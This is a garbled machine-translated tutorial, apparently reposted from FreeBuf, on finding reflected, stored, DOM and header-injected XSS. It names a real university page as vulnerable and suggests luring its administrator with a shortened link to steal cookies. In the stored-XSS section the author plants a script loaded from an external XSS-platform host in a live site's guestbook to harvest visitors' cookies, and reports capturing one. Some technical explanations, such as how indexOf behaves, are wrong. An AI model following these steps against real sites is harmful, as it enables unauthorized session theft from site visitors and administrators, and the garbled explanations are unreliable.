Analysis and anatomy of the Principle of XSS (second article) [Turn]

0x01 Preface:

The above section (http://www.freebuf.com/articles/web/40520.html) has explained the principle of XSS and the method of constructing different environments. This issue is about the classification and mining methods of XSS.

When the first phase comes out, the feedback is very good, but there are still a lot of people asking questions, I will answer here.

Q 1: If I enter a PHP statement will not execute.

Answer 1: No, because XSS is facing the foreground (the user visible part), and PHP is the background processing (the user is not visible), if you can execute the PHP statement, it is not called XSS, called "arbitrary code execution."

What's the difference between asking 2:xss and CSRF?

Answer 2: Yes, XSS is the code and packet that gets the information and does not need to know the other user's page in advance. CSRF is the code and the packet that needs to know the other user's page, instead of the user completing the specified action.

Q 3: Why I tested <script>alert ("XSS") in Chrome </script> did not succeed.

Answer 3:chrome The kernel is not the same as IE kernel, chrome's filtering mechanism is stronger than IE. Testing XSS is now generally able to get over chrome, so when you enter XSS, you may be filtered by chrome filtering mechanism.

To understand the reflection XSS, savings XSS, DOM XSS, to understand the get/post of processing, if you do not understand, please refer to the portal

0x02 Reflection Type XSS:

Reflection XSS is the most common XSS category, and the principle is the following:

hacker--found that url--with reflective XSS constructs an XSS code based on the environment of the output point-encoding, shortening (optional, for added obfuscation)-sent to the victim-after the victim has opened, executes the XSS code--completes the Hacker desired function (access to cookies , URL, browser information, IP, etc.)

The principle is clear, then talk about how to dig it,

Now the software on the market (JSky, Safe3wvs, Netsparker, etc.) can dig out the reflection of XSS, but want to those more covert XSS or need manual, I first use the software to mine some reflection XSS, and then introduce manual mining.

When we find it, we'll open it.

Http://gdjy.hfut.edu.cn/viewcomp.jsp?id=hzgz123

After opening, we try to add woaini (or any other character) after the argument is id=hzgz123, which means that the string must be unique, that is, in the whole site, he must be the only one that is not the same as the other characters. After entering Woaini, open, view source code (ctrl+u ), press Ctrl+f to search for the Woaini string and see where it is now.

We found that the Woaini character is in the href attribute of the A tag, so we can construct it based on this environment, we can use "></a><script>alert" ("XSS") </script> To close the a tag first. Then use script to run the JS code. You can also onclick= "alert (1)", >123</a>//click 123 to trigger the onclick to run JS, and then comment out the contents of the back. After constructing the code, the URL becomes a short connection, sent to the administrator, the temptation to open the administrator, you can get the administrator's cookies.

OK, software dug XSS roughly these, hand in fact and this is almost, manual words, remember a word "see box plug, change the data package is not visible part, change URL parameters, JS analysis" on it. Change the data packet, JS analysis is deep, now I will not elaborate, see box on plug, we should all understand, find a input box, enter a unique string, and then see the source code has not appeared, and then input <> ""/& () to see which characters are filtered, according to the filter characters To construct the XSS.

QQ space is a reflection of XSS, because it is a friend, I do not know whether to be submitted, so I will not release.

0X03 Savings-Type XSS:

PS: Some people are called persistent type, each has its own name, so don't mind too much.

Savings-type XSS is almost the same as reflective XSS, except that the savings type stores the data on the server, and the reflection type just lets XSS roam the client. Here is the savings XSS I detected on some site, and everyone knows the principle is OK.

(because, this site I want to submit, so URL coding processing, forgive me)

Target site:http://www.*******.com/

Habitual open message (book.asp), click the message (it is best not to use <script>alert ("XSS") </script> to test for an XSS vulnerability, easy to be discovered by the administrator, so you can use <a ></a> to test, if successful, will not be found by the administrator) OK, I first in the message input <a>s</a> submit a message, F12 open the review element, to see whether the label we entered is filtered,

OK, found no filter (if the <a>s</a> is colored the description is not filtered, if it is gray to explain the filter)

Then I will create a project in the XSS platform, and then leave a message, inside, "<script src=" http://xss8.pw/EFe2Ga?1409273226 "></script> ask how to register AH"

The name is my mess, so as long as you visit

Http://www.******.com/book.asp

You can get your cookies, as well as the back office address (because the message board is generally audited in the background). However, the administrator seems to have died, has been 6 days, has not seen. Today on the XSS platform a look at a cookie, looked at, is passers-by, not the administrator.

But the use of the method everyone should understand. As soon as you open the http://www.******.com/book.asp I will get your cookies in the first time.

0x04 DOM XSS:

DOM XSS is based on JS. And he does not need to interact with the server, like reflection, saving all need the service side feedback to construct XSS, because the server is invisible to us (not too clear, can see (http://www.freebuf.com/articles/neopoints/41168.html)

Digging Dom XSS is troublesome, because sometimes you need to chase the source, the other side may customize the function, so you need step by step to the other side of the custom function to clarify. Let me give you one of the simplest examples:

Input in 1.html

<script>document.  Write(document.  URL.  SUBSTRING(document.  URL.  IndexOf("a=") +2,document.  URL.  Length)); </script>                

Here, I'll explain what I mean here.

Document.Write is to write the contents to the page.

Document. The URL is the Get URL address.

Substring from somewhere to somewhere, to get the content between.

Document. Url.indexof ("a=") +2 is the current URL to retrieve the a= character from the beginning, and then add 2 (because a= is two characters, we need to omit him), and he is also the starting value of substring

Document. Url.length is the length of the current URL and also the end value of the substring.

Together, it means to get the value behind a= in the URL, and then display the value behind the a=.

Let's open up and see

How can this problem arise?

Because the current URL does not have a a= character, the IndexOf attribute is that, when the obtained value is not found, the value returned is 1. If found, returns 0. So document. Url.indexof ("A=") is 1, plus 2, 1. Then continue to the URL at the end. In this way, the F character of file is omitted, so it will appear ile:///c:/users/administrator/desktop/1.html

The general principle will be, we continue.

We can enter after 1.html a=123 or #a=123, as long as the previous path is not affected, and ensure that the a= appears in the URL can be.

We see clearly that the characters we have entered are displayed.

What happens when we enter <script>alert ("XSS") </script>?

The answer must be the pop-up window.

But there must be someone here who can't play the window like this.

This is because browsers are different, Maxthon, Firfox, Chrome are not, they will encode the URL before you submit the data. This is not to say that Dom XSS is not enough, this is just a simple example, so don't worry.

I say that DOM XSS is based on JavaScript and does not interact with the server, his code is visible to you, and the service-side reflection and savings are invisible.

0x05 XSF (Flash XSS):

The xsf is not really an XSS category, it should count as the branch of XSS, because the techniques used in XSS are only part of the xsf that can be used, because the XSF is based on the actionscript2/3.0 language.

I write the XSS series so that most people unfamiliar with XSS know how to use this attack technique, so I'm not going to go into the xsf in depth, and if there is a chance, you will see the XSF technology in the later series.

Let me briefly explain below, in actionscript2/3.0 the following functions need to focus on:

GetURL navigatetourl externalinterface.call externalinterface.call htmltext addcallback and so on. Interested friends can first study under their own.

0x06 Mining XSS:

There are many techniques for exploiting XSS, and I'll briefly explain where XSS is prone.

I've said it before. Modify the input box and URL parameters to implement XSS. I'm here to go into a little bit of clarification.

When you modify the URL parameters, all you see is the use of get to transfer data, as well as the invisible data, they use post to transfer data, only in the packet can be seen. Here does not elaborate, do not understand can refer to before I write the use of methods, get and post using the method is almost the same. It is not clear that post and get can be viewed in the preamble of 0x01 to see the link I gave.

No more nonsense, let's get down to the chase.

A: We all know that when you browse the site, the other party's server will record your IP address. What if we fake IP as XSS code? This is said to modify IP as XSS is not said to modify the PC side, but in the browser is the client on the Web page to modify.

Firefox browser and two attachments are required here

Annex I: X-forwarded-for Header

Because PHP gets an IP there are 3 functions. and X-forwarded-for header is to one of the functions x_forwarded_for function, x_forwarded_for have a flaw can make the client forge arbitrary IP, of course, including strings, but for the other two functions are not.

Annex II: Modify Headers

Modify headers can forge the contents of a packet, but can also forge a http_client_ip to change the IP.

There's another remote_addr. Gets the IP function, how does this change? The answer is no modification.

REMOTE_ADDR is passed to PHP by Nginx parameters, so is the current Nginx direct communication of the client's IP, and we can not intervene. So once the other party uses the REMOTE_ADDR function to obtain the IP, there is no way. But it doesn't matter, altogether 3 functions, 2 functions can be forged, we still have a great success rate. Okay, start forging.

After forging well, we open www.ip138.com to see,

The window has been successfully played. Because I configured the <script>alert ("XSS") </script> in the x-forwarded-for header. The modify headers is configured with the <script>alert ("Xss2") </script>. This means that Ip138.com uses the X_forwarded_for function to obtain the IP. But Dz and other famous CMS does not exist, they are filtered.

Just like the loophole box (https://www.vulbox.com),

The HTTP_CLIENT_IP function is used to obtain the IP, but it is filtered. You can write the configuration as a cookie to get it first. Later on casually browsing the site, maybe one day you can catch one of them.

This method is misty last year to inform.

0x07 End:

It is understood in this chapter that XSS is not necessarily modified in the input and Get/post parameters before it can be inserted into XSS. There are JavaScript, actionscript2/3.0, and packet parameters. When playing XSS, the mind can not be fixed, to be flexible and changeable.

This chapter will end, if there is nothing unexpected in the next section is to talk about XSS skills, please look forward to.

Analysis and anatomy of the Principle of XSS (second article) [Turn]